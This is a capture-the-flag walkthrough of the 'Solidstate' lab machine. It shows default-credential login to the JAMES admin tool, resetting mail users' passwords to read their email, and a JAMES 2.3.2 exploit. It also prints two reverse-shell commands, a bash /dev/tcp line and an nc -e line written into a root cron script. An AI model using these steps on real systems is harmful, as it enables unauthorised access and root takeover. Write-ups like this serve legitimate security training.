The first step as always was to run Nmap against the machine:
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# nmap -p- -oN scan -sC -sV -O 10.10.10.51 Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 13:52 EST Nmap scan report for 10.10.10.51 Host is up (0.022s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA) | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA) |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519) 25/tcp open smtp JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.14 [10.10.14.14]), 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Home - Solid State Security 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) 4555/tcp open james-admin JAMES Remote Admin 2.3.2 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=1/22%OT=22%CT=1%CU=30027%PV=Y%DS=2%DC=I%G=Y%TM=600B1F3 OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1 OS:1NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.22 seconds
There are a number of ports open. It appeared to be running a mailserver. The one of interest is port 4555 which is the remote admin interface. I telnetted to this port and was greeted with a login prompt.
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# telnet 10.10.10.51 4555 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id:
After some googling I discovered the default credentials for this interface were root:root. I tried these and successfully logged in. I was then able to list the mail users:
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# telnet 10.10.10.51 4555 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id: root Password: root Welcome root. HELP for a list of commands listusers Existing accounts 6 user: james user: ../../../../../../../../etc/bash_completion.d user: thomas user: john user: mindy user: mailadmin
I then changed the password for each of the users to “password” using the setpassword command:
setpassword mindy password Password for mindy reset setpassword james password Password for james reset setpassword john password Password for john reset setpassword thomas password Password for thomas reset setpassword mailadmin password Password for mailadmin reset
I then connected to port 110 using telnet and attempted to read the emails on the accounts:
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# telnet 10.10.10.51 110 1 ⨯ Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready user mindy +OK pass password +OK Welcome mindy list +OK 2 1945 1 1109 2 836 . retr 1 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798 for <mindy@localhost>; Tue, 22 Aug 2017 13:13:42 -0400 (EDT) Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT) From: mailadmin@localhost Subject: Welcome Dear Mindy, Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you. We are looking forward to you joining our team and your success at Solid State Security. Respectfully, James . retr 2 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581 for <mindy@localhost>; Tue, 22 Aug 2017 13:17:28 -0400 (EDT) Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT) From: mailadmin@localhost Subject: Your Access Dear Mindy, Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. username: mindy pass: P@55W0rd1!2@ Respectfully, James .
As you can see from the output, I was able to view Mindys email using the password I set. Her username and password used to log in to the machine were provided in the email. I then connected via ssh to the machine using the credentials mindy:P@55W0rd1!2@:
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# ssh mindy@10.10.10.51 mindy@10.10.10.51's password: Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jan 26 12:56:58 2021 from 10.10.14.14 mindy@solidstate:~$ ls bin LinEnum.sh out.txt thu.txt user.txt mindy@solidstate:~$ cat user.txt [REDACTED] mindy@solidstate:~$
As you can see from the output, this was successfully, and I was able to capture the user flag.
Mindy’s default shell is rbash. Which is a restricted version of bash. So you cannot navigate outside the home directroy. I discovered an exploit HERE which creates a user using the JAMES remote administration tool with a local file inclusion, this user is then emailed a payload which is executed when logging in to the machine.
I modified the payload variable at the top of the script with the following string which creates a reverse shell back to my machine:
payload = 'bash -i >& /dev/tcp/10.10.14.14/2601 0>&1'
I executed the payload against the Solidstate machine:
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# python 35513 10.10.10.51 130 ⨯ 1 ⚙ [+]Connecting to James Remote Administration Tool... [+]Creating user... [+]Connecting to James SMTP server... [+]Sending payload... [+]Done! Payload will be executed once somebody logs in.
I then started a netcat listener on port 2601:
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# nc -nvlp 2601 1 ⚙ Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2601 Ncat: Listening on 0.0.0.0:2601
Then logged in via SSH to execute the payload.
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# nc -nvlp 2601 1 ⚙ Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2601 Ncat: Listening on 0.0.0.0:2601 Ncat: Connection from 10.10.10.51. Ncat: Connection from 10.10.10.51:41548. ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd / cd / ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls ls bin boot dev etc home initrd.img initrd.img.old lib lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$
As you can see, the payload was executed and captured in the netcat listener. rbash is no longer being used and so can navigate outside the home directory.
I next went on to find a way to esclate privilages. I discovered a file in /opt/ called tmp.py This file was writable by the mindy user but owned by root. It appeared to be a script used to clear the /tmp/ directory. I echoed some python code into this file to spawn another reverse shell back to my attacking machine:
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo "import os;os.system('nc -e /bin/sh 10.10.14.14 2123')" > tmp.py
The hopes with this is that the script is run on a schedual, considering it was owned by root it would hopefully be run by root as well. I started another netcat listener on port 2123 as specified in the tmp.py file, and waited.
┌──(root💀kali)-[/home/kali/Documents/solidstate] └─# nc -nvlp 2123 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2123 Ncat: Listening on 0.0.0.0:2123 Ncat: Connection from 10.10.10.51. Ncat: Connection from 10.10.10.51:42662. ls root.txt whoami root cat root.txt [REDACTED]
After a few minutes, as you can see from the output, a shell was captured by the listener, and it was infact a root shell so was able to capture the root flag.